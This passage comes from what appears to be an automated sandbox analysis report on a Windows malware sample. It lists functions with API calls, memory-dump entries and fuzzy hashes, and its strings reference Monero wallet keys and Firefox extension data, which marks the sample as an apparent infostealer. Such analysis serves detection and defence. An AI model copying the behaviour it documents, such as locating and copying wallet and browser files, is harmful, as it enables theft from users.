                              • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A512F5
                              • RegCloseKey.ADVAPI32(?), ref: 00A512FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID:
                              • API String ID: 3225020163-0
                              • Opcode ID: ba9e55be0cf6e32c7fa7cbbb72aa47b5094a11250944c481862597773e12ac3e
                              • Instruction ID: 025bbd7b22d33772abbe528383b566833a4c074c7df2f3d8e7930b129d97a698
                              • Opcode Fuzzy Hash: ba9e55be0cf6e32c7fa7cbbb72aa47b5094a11250944c481862597773e12ac3e
                              • Instruction Fuzzy Hash: 9901E1B9A40208BBDB04DFE4DC4EFAEB7B8EB48705F10815AFA05D72C0D6759A058F95
                              Function 00A66630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A66663
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A66726
                              • ExitProcess.KERNEL32 ref: 00A66755
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                              • String ID: <
                              • API String ID: 1148417306-4251816714
                              • Opcode ID: bb81e4d6eea20c48a2532a83163638b934d6642c77033fe8402f623981012fc7
                              • Instruction ID: 448df60ce9faba87f730c1aec69d2bee3c146ca046ed246386f77f39c3d13ea9
                              • Opcode Fuzzy Hash: bb81e4d6eea20c48a2532a83163638b934d6642c77033fe8402f623981012fc7
                              • Instruction Fuzzy Hash: F13129B2901218AADB14EB90DE96BDEB77CAF14300F404189F20977191DF746B48CFAA
                              Function 00A687C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A70E28,00000000,?), ref: 00A6882F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A68836
                              • wsprintfA.USER32 ref: 00A68850
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f49fddc881fb17d84f791062f2ad90f5de2175bff59e384bf41b3b28fb96af1d
                              • Instruction ID: c2cd60729f808e118ba1e8467268853d9fb6259be5853ee42df9699a8eaa8bba
                              • Opcode Fuzzy Hash: f49fddc881fb17d84f791062f2ad90f5de2175bff59e384bf41b3b28fb96af1d
                              • Instruction Fuzzy Hash: 85210DB1A40208AFDB04DFD4DD49FAEBBB8FB48B11F10455AF605A72C0C779A901CBA5
                              Function 00A68D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A6951E,00000000), ref: 00A68D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A68D62
                              • wsprintfW.USER32 ref: 00A68D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 2a7e1c39c93958800543e4aa7614ae634201248947b79f0608c754ce25ddabbe
                              • Instruction ID: a0d7fa17cc2ced6890b4b7e5ce64d08abfb3a9834ea99b651d36f59a99f945eb
                              • Opcode Fuzzy Hash: 2a7e1c39c93958800543e4aa7614ae634201248947b79f0608c754ce25ddabbe
                              • Instruction Fuzzy Hash: 57E0ECB5A40208FBD710DBD4DD0EF6D77B8EB44702F004195FD0997380DA719E109B96
                              Function 00A5A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5A2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 00A5A3FF
                              • lstrlen.KERNEL32(00000000), ref: 00A5A6BC
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5A743
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: e9cd118d078d7fe1ccc74e386c1d21d11103735f89cd5fa65b4a68b984710f80
                              • Instruction ID: ba870b3c42ae3f397caa16d74e3907f238d342d62f342e230210ffdfbe4f4585
                              • Opcode Fuzzy Hash: e9cd118d078d7fe1ccc74e386c1d21d11103735f89cd5fa65b4a68b984710f80
                              • Instruction Fuzzy Hash: 66E1CB729101089ADB05FBA4DE96EEE7338AF74300F508569F516B7091EF346A4DCFA2
                              Function 00A5D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5D481
                              • lstrlen.KERNEL32(00000000), ref: 00A5D698
                              • lstrlen.KERNEL32(00000000), ref: 00A5D6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5D72B
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 2f8ce84e8d6c4f531160b40034f038b564d78bf252646cb2bf41449a4f375c33
                              • Instruction ID: 7401a68eecb27e5d9ce48a4d6141aa7bfc0d371b8725b26f68c19d32ab00aedc
                              • Opcode Fuzzy Hash: 2f8ce84e8d6c4f531160b40034f038b564d78bf252646cb2bf41449a4f375c33
                              • Instruction Fuzzy Hash: 66918C729101089ADB14FBA4DE96EEE7338AF74300F508569F517B7091EF346A49CFA2
                              Function 00A5D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A5D801
                              • lstrlen.KERNEL32(00000000), ref: 00A5D99F
                              • lstrlen.KERNEL32(00000000), ref: 00A5D9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00A5DA32
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 687d59cd2b92a493a81534492679731ea6f04fd9c81ec285f6d30bf6430d834a
                              • Instruction ID: afbc9e2bc95a6bd989b89ab6d6efe578bf2dc76c7d8055d0f119115363565126
                              • Opcode Fuzzy Hash: 687d59cd2b92a493a81534492679731ea6f04fd9c81ec285f6d30bf6430d834a
                              • Instruction Fuzzy Hash: 418199729101089ADB14FBA4DE96EEE7338BF64300F504569F516B70A1EF346A49CFA2
                              Function 00A5F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00A71580,00A70D92), ref: 00A5F54C
                              • lstrlen.KERNEL32(00000000), ref: 00A5F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: f7e056669bcb0cb5559a17d0ce1e92ea7f77cd41f2cb4d5365d411ff662e5fab
                              • Instruction ID: 1e89db324f66873621a21adf05fff392edfb8d6a9a1adb49bdfcb7a3bf109d5d
                              • Opcode Fuzzy Hash: f7e056669bcb0cb5559a17d0ce1e92ea7f77cd41f2cb4d5365d411ff662e5fab
                              • Instruction Fuzzy Hash: 4B51D272D10108AADB04FFA4DE96DED7379EF64300F508529F916B7191EE346A09CFA2
                              Function 00A63560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 5186170e3041df3e46f3dee4cf3087ad2c392b1e28b8c00eb1f6963d3935f189
                              • Instruction ID: 8e7feb0f8ed26299926adb0e3dd19426d7eb3fabc9b8a62626f28b701080a228
                              • Opcode Fuzzy Hash: 5186170e3041df3e46f3dee4cf3087ad2c392b1e28b8c00eb1f6963d3935f189
                              • Instruction Fuzzy Hash: 02413CB6D10109EBCF04EFA4DD55AEEB774AF64304F008418E516B7290EB75AA06CFA6
                              Function 00A59CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
